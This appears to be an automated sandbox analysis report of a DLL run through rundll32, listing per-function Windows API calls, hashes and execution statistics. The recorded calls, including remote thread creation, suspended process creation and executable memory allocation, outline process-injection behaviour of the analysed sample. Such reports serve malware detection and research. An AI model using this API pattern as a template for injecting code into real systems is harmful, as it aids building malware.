    control_flow_graph 2969 10083555-10083567 2970 10083569-10083575 2969->2970 2971 1008357b-100835b1 VirtualAlloc 2969->2971 2970->2971 2972 100837bd-100837c5 2970->2972 2973 10083921-10083929 2971->2973 2974 100835b7-100835bd call 100835c2 2971->2974 2975 100837d1-100837d2 2972->2975 2976 100837c7-100837ce 2972->2976 2974->2973 2975->2973
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 100835A9
    Memory Dump Source
    • Source File: 00000003.00000002.336246305.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10080000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction ID: 0e55dd4c9f7470d52eab4346b396aa946e407808a0d127f0e42209d590d0d6a2
    • Opcode Fuzzy Hash: 249bba57007782f45bf0e84b72b43045c2c6b24cb456ac19ab3cd77c178e24dd
    • Instruction Fuzzy Hash: 97F04F35D483688BDF61CE248C0C7D9BBB0AB40340F0144D9E9C977295D6B46EC68F54
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,1006A2E0,00000104), ref: 1000AE7E
    • strrchr.MSVCRT ref: 1000AE8F
    • _ftol.MSVCRT ref: 1000AFCE
    • GetCommandLineA.KERNEL32 ref: 1000AFF4
    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 1000B061
    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1000B093
    • TranslateMessage.USER32(?), ref: 1000B09A
    • DispatchMessageA.USER32(?), ref: 1000B0A1
    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1000B0B0
    • wsprintfA.USER32 ref: 1000B2F3
    • MessageBoxA.USER32(00000000,?,1006A018,00000010), ref: 1000B30A
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Message$Peek$CommandDispatchFileLineModuleNameTranslate_ftolstrrchrwsprintf
    • String ID:
    • API String ID: 3335176381-0
    • Opcode ID: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
    • Instruction ID: 550dcc155c2af2a742ea6bd1faa3485fa46c40cd6c1f5de1c3546930abff5cc3
    • Opcode Fuzzy Hash: ecb263c5883be14fbdd7951b27c3f5027ec344516bfbf6eaecd4f87e6cf4e675
    • Instruction Fuzzy Hash: 48C139377849044AF320E668BC41BFFB781E7D13F2F50053BEA05CA1D4D96BA949CA66
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 1000C4CB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 1000C4EA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 1000C501
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 1000C518
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction ID: 77cbe7fce8ef9562389d15453b58eba8ebe27cca9de610a2ae966a0e19f657af
    • Opcode Fuzzy Hash: 9b90a25063b9e1c39bff7ddda37614abe361fa60ecb1f47f8ab911e9c3895cb3
    • Instruction Fuzzy Hash: 7F3103B550874A9BF720C728CC95F6E36D0E7417C0F20891AF585C60D9E6B4E88097A2
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction ID: 997e975f8056afc4703edd2e8b222d0f39c38b45864d1c521b5624a5b2537b3b
    • Opcode Fuzzy Hash: 60cd75bbc9cd8ca24744c5fda6e17e72869eac0f45f0e376a98c2c6226a09f87
    • Instruction Fuzzy Hash: 69514A756046054BF738C6248C42AEF73D5EBC23A0F248B2DFA55C31D8EE7AD9858392
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • malloc.MSVCRT ref: 1000BB13
    • LCMapStringA.KERNEL32(00000804,00400000,?,?,00000000,?,?,?,100695CA,?,00000000,00000000,?,10009E2B,00000001,00000000), ref: 1000BB47
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB56
    • ??3@YAXPAX@Z.MSVCRT ref: 1000BB74
    Memory Dump Source
    • Source File: 00000003.00000002.336193298.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??3@$Stringmalloc
    • String ID:
    • API String ID: 1006641717-0
    • Opcode ID: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction ID: c44458945b11d331972013727580eba0770bfaca40fb43e82456e2fbb398e2da
    • Opcode Fuzzy Hash: 6a2a28c6ebfc604dd3311785f4f21d4eed50436354b036f7b997f2173f3be702
    • Instruction Fuzzy Hash: ED1105762046043BE218DA799C42E6B73CADBC42A1F10462DF226922C5DE72ED054765
    Uniqueness

    Uniqueness Score: -1.00%

    Execution Graph

    Execution Coverage: 15.5%
    Dynamic/Decrypted Code Coverage: 1.6%
    Signature Coverage: 0%
    Total number of Nodes: 764
    Total number of Limit Nodes: 19
    execution_graph: rendered execution graph (node and edge listing omitted; the APIs reached from each function are listed in the per-function records of this report)
    APIs
    • LocalSize.KERNEL32(00000000), ref: 1000372A
    • RtlMoveMemory.NTDLL(00000000,?), ref: 100039B0
    • LocalSize.KERNEL32(00000000), ref: 10003D81
    • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 1000417F
    • LocalSize.KERNEL32(00000000), ref: 10004484
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: LocalSize$MemoryMove
    • String ID:
    • API String ID: 2329245388-0
    • Opcode ID: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction ID: 6597548e417ce41973f24dc3fe005e763f74c0b4b92ccc5acbc8f0888a27e9fc
    • Opcode Fuzzy Hash: 7ace0d35f767871dd564e10688227d60866cd99a6ec69d537ca719f32c9c7f33
    • Instruction Fuzzy Hash: 9163A4F5A812568BFB00CF58DCC1699B7F1FF69364B291471E846AB304D378B861DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleHandleA.KERNEL32(?,?,?,00000000,00000001,00000001), ref: 100019EE
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00001000,00000040), ref: 10001B1D
    • NtReadVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,?), ref: 10001B63
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,?,00001000,00000040), ref: 10001BF9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001CF0
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001D29
    • NtAllocateVirtualMemory.NTDLL(FFFFFFFF,00000000,00000000,00000000,00003000,00000040), ref: 10001DA9
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E35
    • NtFreeVirtualMemory.NTDLL(FFFFFFFF,00000000,?,00010000), ref: 10001E78
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: MemoryVirtual$Free$Allocate$HandleModuleRead
    • String ID:
    • API String ID: 3626904461-0
    • Opcode ID: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction ID: 18045018c71ed80e37ca4e743997fd2e00c365ecd51ce7d830d4e4c8732093b4
    • Opcode Fuzzy Hash: e41221d228e3099dbaa53f065df4f9fc7eb341e2a8ca2d0f562e219e06e247af
    • Instruction Fuzzy Hash: 6D1249B1D10219ABFF40DFA4DC82BEEB7B9EB09390F105035F515B6285E771AA44CB62
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleFileNameA.KERNEL32(000000FF), ref: 10001438
    • LoadLibraryA.KERNELBASE(?,?,?,10069CE3,?,?,?), ref: 10001589
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,1000753C,00000000,00000000,00000000,00000000), ref: 10001660
    • CreateRemoteThreadEx.KERNELBASE(FFFFFFFF,00000000,00000000,Function_00008E08,00000000,00000000,00000000,00000000), ref: 10001781
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CreateRemoteThread$FileLibraryLoadModuleName
    • String ID: -K NetworkService
    • API String ID: 1086537905-2689450296
    • Opcode ID: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction ID: 192b5ded5049eacffa80d3a177baae0e671814ab7fcffe4313666e61edc3dd04
    • Opcode Fuzzy Hash: b0c4e49a0226506626da4696a25d283b1a2ed37e453f38bc93039b9eaa77c593
    • Instruction Fuzzy Hash: 07A121B5E10345ABFB40DFA0CCC2BEE76B9EB14780F104075F605BB286EA75AB149B51
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CreateFileA.KERNELBASE(00000000,00000002,00000000,00000000,00000002,00000020,00000000), ref: 1000308D
    • WriteFile.KERNELBASE(00000000,10007715,00000000,?,00000000), ref: 1000324E
    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 10003270
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$ChangeCloseCreateFindNotificationWrite
    • String ID:
    • API String ID: 3805958096-0
    • Opcode ID: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction ID: d20d66cfc10cbe3857bc80674b720ab49801aad87d9546e672d044fe8a3a2069
    • Opcode Fuzzy Hash: 56f5217a5ff58419c402300fced1701773d6cbec5d636d564aa0362071dec691
    • Instruction Fuzzy Hash: C0619AF5D00205AFFB41DFA4DC83BAF77B5EB09380F104075F645AB286E6756A448BA2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • TerminateProcess.KERNELBASE(00000000,00000000,?,10005668,00000000,00000000), ref: 10005E7D
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005EAC
    • CloseHandle.KERNEL32(00000000,?,10005668,00000000,00000000), ref: 10005ED8
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: CloseHandle$ProcessTerminate
    • String ID:
    • API String ID: 1541851893-0
    • Opcode ID: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction ID: 36467d162fe4f9701ac00e92914ba883088f779945990f223c5d709893f0a5e0
    • Opcode Fuzzy Hash: 7c947d757b40d2b1d0a58a98e59bc80ae9684e0590784dd83700156d9b6bac4d
    • Instruction Fuzzy Hash: 883130B4A00318EBEF00DF94D9C1B9EBB70FB0E351F1050A5EA486B356C7716A54DBA6
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002D72
    • PathIsDirectoryA.SHLWAPI(00000000), ref: 10002F46
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: DirectoryPath
    • String ID:
    • API String ID: 1580926078-0
    • Opcode ID: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction ID: 1ec6a9b9599abdcb0927499382ee2c56efe62a98ad550a515e2561b25c9f74a4
    • Opcode Fuzzy Hash: 952b3ee820ae0fce44b1993c9e55d840ad73d41c8d9cbaca60f6c06b9dd94f26
    • Instruction Fuzzy Hash: 368151B5E00206ABFB40DFA4DC82BBEB7B5EF193C0F140079E545F6249E771AA548762
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction ID: 6bd08ba5558e1723e664c623841c749a5d5f02c338c490c126332124de29b97e
    • Opcode Fuzzy Hash: a21b6345c22cde698bb8e6042296a18b9237ae50acfa973f10934829fa115130
    • Instruction Fuzzy Hash: 35B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction ID: a6a88fea8a15b71c93179c30403b5c246083cf119354f26f4d88da3cc7a861b2
    • Opcode Fuzzy Hash: 1999a4e140ade5994fbc139359fbd3a3e3541bf41f421a645fe8dc29bbbb4e7d
    • Instruction Fuzzy Hash: 56B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction ID: 18200786322e2296e48886ba80c3c0a0571579295a8a8f8cccfe2eafa6c45a37
    • Opcode Fuzzy Hash: 21b147d3242dff41688a4e607ccc271381ba4f9bf2a3db1154b2a9a322427d62
    • Instruction Fuzzy Hash: 33B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction ID: 2ab24672fad017e54084c68c726b6677777c2dd61183461ce3e7d2b956ec3b11
    • Opcode Fuzzy Hash: a8e977d5e6929cacd8ac213e15fadd063f0ff8242314a0019d4a04ef5fe6b589
    • Instruction Fuzzy Hash: 42B1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction ID: 4fc1348e7e92fee5a10d5f52c872e9f0b591b432bef915be5527e0563184c5c5
    • Opcode Fuzzy Hash: 3dc280fe55abc01b58db292e390aabea07e0da105420eb392ee7620be3622837
    • Instruction Fuzzy Hash: 85B1A8F1A402529BFF00CFA8DCC1B8977A5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,Function_0000E210,00000000), ref: 10005D98
      • Part of subcall function 10005D6F: GetEnvironmentVariableA.KERNEL32(10069723,00000000,00000000,00000000,00000001), ref: 10005E0C
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 1000486F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: EnvironmentVariable$CreateProcess
    • String ID:
    • API String ID: 2302763869-0
    • Opcode ID: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction ID: ac85400423f5c659f8c14131d3889ba6e7c23d82175b45f4af381173e65af412
    • Opcode Fuzzy Hash: 62d3435ecaf67b690040494e715479c48cb913ef0c9a276450b22e2695167ed7
    • Instruction Fuzzy Hash: BCB1B8F1A402529BFF00CFA8DCC1B8977E5EF29364B291470E546AB305D778B961DB22
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • WSAStartup.WS2_32(?,00000000), ref: 10001148
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction ID: d74f7e4fc3d2271a8ab4d4adfaa925da7f5db712bb5ec264062f05ece0e1d290
    • Opcode Fuzzy Hash: 0b9b7ad6b27d15674f0398aaa48fba4813a74bb0a603e7b5ba06d62348bc4f8d
    • Instruction Fuzzy Hash: 7C8184F6A402025BF740CB68DCC1BAA73E9EF583A4F290075E9059B345E679BD15C722
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A7EE
    • strrchr.MSVCRT ref: 1000A817
    • RegOpenKeyA.ADVAPI32(00000000,00000000,?), ref: 1000A830
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A853
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00000400,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A876
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A884
    • ??2@YAPAXI@Z.MSVCRT ref: 1000A88E
    • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000), ref: 1000A8AB
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8DA
    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000698,00000000,00000000,00000000,?), ref: 1000A8E7
    • ??3@YAXPAX@Z.MSVCRT ref: 1000A8EE
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: ??2@??3@$QueryValue$CloseOpenstrrchr
    • String ID:
    • API String ID: 1380196384-0
    • Opcode ID: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction ID: b054589480694306ed07ebfcb3a54d079748cc68523788b519db9fcbf24356dc
    • Opcode Fuzzy Hash: 0055807da5042bb647736de19bf315c7cc7080262b94f7f0173f30ff330bb7ad
    • Instruction Fuzzy Hash: A04106756003055BF314DB689C45E2B77D8EFC12E0F144A2DFA55C3285EE76ED0A83A2
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetModuleHandleA.KERNEL32(?), ref: 1000B3A2
    • LoadLibraryA.KERNEL32(?), ref: 1000B3AF
    • wsprintfA.USER32 ref: 1000B3C6
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B3DC
      • Part of subcall function 10009390: ExitProcess.KERNEL32 ref: 100093A5
    • atoi.MSVCRT ref: 1000B41B
    • strchr.MSVCRT ref: 1000B453
    • GetProcAddress.KERNEL32(00000000,00000040), ref: 1000B471
    • wsprintfA.USER32 ref: 1000B489
    • MessageBoxA.USER32(00000000,?,1006A09C,00000010), ref: 1000B49F
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Messagewsprintf$AddressExitHandleLibraryLoadModuleProcProcessatoistrchr
    • String ID:
    • API String ID: 3187504500-0
    • Opcode ID: 1e74c7f77422cecd63aab9e311876e558fdabb2abce9660980f53871a6bc04ee
    • Instruction ID: 491f2c0a62f37e4f67161009499e29b69e0f741f7a8c9d6e7004f4b75a98df72
    • Opcode Fuzzy Hash: 1e74c7f77422cecd63aab9e311876e558fdabb2abce9660980f53871a6bc04ee
    • Instruction Fuzzy Hash: FC314AB26007555FF320EF24DC84B9B7B98EB85380F004929FB0993246EB75E909CBB5
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CreateFileA.KERNELBASE(80000004,80000000,00000003,00000000,00000003,00000020,00000000,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096B5
    • GetFileSize.KERNEL32(00000000,10069CDF,?,00000268,?,10001489,00000001,10069CDF,00000000,80000004,00000001), ref: 100096CC
      • Part of subcall function 10009430: GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
      • Part of subcall function 10009430: RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
      • Part of subcall function 10009430: MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    • ReadFile.KERNELBASE(00000000,00000008,00000000,?,00000000,00000001), ref: 100096F8
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 100096FF
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: File$Heap$AllocateChangeCloseCreateFindMessageNotificationProcessReadSize
    • String ID:
    • API String ID: 4143106703-0
    • Opcode ID: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction ID: cdbe4ea1d30985889301e2374bea63683511f888104e621f128e3cfb89859431
    • Opcode Fuzzy Hash: 9381e33eb8e62eb59d2cf853d973df5be84e3c18288bfb382a4d906760cea2b3
    • Instruction Fuzzy Hash: 37F04476201310BBF3119F64DCC9FAB77BCEB84B90F104A1EF646961D5E670A5058771
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetProcessHeap.KERNEL32(1000B517,00000008,00000002,00000000,10009825,00000007,00000003,?,?,1000261C,00000003,00000000,00000000,80000005,00000002,00000000), ref: 10009439
    • RtlAllocateHeap.NTDLL(1006A1D4,00000008,80000301), ref: 1000944D
    • MessageBoxA.USER32(00000000,10069FE8,10069FB4,00000010), ref: 10009466
    Memory Dump Source
    • Source File: 00000004.00000002.321066532.0000000010000000.00000040.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
    Similarity
    • API ID: Heap$AllocateMessageProcess
    • String ID:
    • API String ID: 2992861138-0
    • Opcode ID: ad4a4f6ef7c16550fb0ea6375233d6a0664593d262914b5985d026670057f814
    • Instruction ID: ca495d503fa8b24896a3a0ddeaa4d588f6ba14c0d85a12038cb70845f0cd2cd9
    • Opcode Fuzzy Hash: ad4a4f6ef7c16550fb0ea6375233d6a0664593d262914b5985d026670057f814
    • Instruction Fuzzy Hash: 59E0D8B56401317BF310FB609C49F8A7698DB057C1F014015FD05D6154E774D8018B71
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 1008363F
    • VirtualProtect.KERNELBASE(?,?,7373652D,73736297,?,7373652D,00000000,73736297), ref: 100837AE
    Memory Dump Source
    • Source File: 00000004.00000002.321187702.0000000010080000.00000040.00000800.00020000.00000000.sdmp, Offset: 10080000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_10080000_rundll32.jbxd
    Similarity
    • API ID: Virtual$FreeProtect
    • String ID:
    • API String ID: 2581862158-0
    • Opcode ID: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction ID: cbfd066a6669cc03ceefd0d281f04ad6062c5cf2e557b09b294620d1cb926219
    • Opcode Fuzzy Hash: 5116512cfd6bf09bdea013bebf5e822baf0d3f282df84516e26171709676dcb2
    • Instruction Fuzzy Hash: C5612572E04210AFDB21CA18CC847AAB7A1FFC5350F74C4A6D8899B391E775AD92CB50
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
